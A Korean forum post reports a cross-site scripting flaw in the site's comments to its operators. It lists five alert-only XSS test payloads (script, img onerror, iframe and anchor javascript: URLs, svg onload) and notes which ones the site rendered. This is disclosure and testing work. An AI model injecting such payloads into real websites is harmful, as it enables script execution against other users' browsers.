인텔 코어 울트라7
대장님 긴급!! 긴급!! 운영진 외 접근하지 말아주세요.
쪽지 승인 : 2025-09-23 11:11:17
0
0

<br>이나 인식시키려고 textarea 태그의 HTML을 허용한걸로 보이는데

 

순간 다른 분의 글에 댓글 달다가 발견..

 

내용은 댓글로 확인해주세요..

 

각종 테스트 댓글로 진행해볼 예정

 

<script>alert('XSS 테스트')</script>
<img src=x onerror="alert('이미지 onerror 테스트')">
<iframe src="javascript:alert('iframe javascript 실행')"></iframe>
<a href="javascript:alert('링크 클릭 시 실행')">클릭 시 자바스크립트 실행</a>
<svg onload="alert('SVG onload 실행')"></svg>
 

사용된 코드입니다.

 

 

<script>alert('XSS 테스트')</script>

script태그는 인식되지만 내부 코드는 인식되지 않음. PASS

 

 

<img src=x onerror="alert('이미지 onerror 테스트')">

인식됨.

 

 

<iframe src="javascript:alert('iframe javascript 실행')"></iframe>

인식됨.

 

<a href="javascript:alert('링크 클릭 시 실행')">클릭 시 자바스크립트 실행</a>

인식됨.

 

<svg onload="alert('SVG onload 실행')"></svg>

코드는 인식되지만 실행은 되지 않음.

 

0
0
By 기사제보 및 정정요청 = master@villain.city
저작권자ⓒ 커뮤니티 빌런 18+ ( Villain ), 무단전재 및 재배포 Ai 학습 포함 금지
Comment
신규회원모집이벤트
  • 종합
  • 뉴스/정보
  • 커뮤니티
  • 질문/토론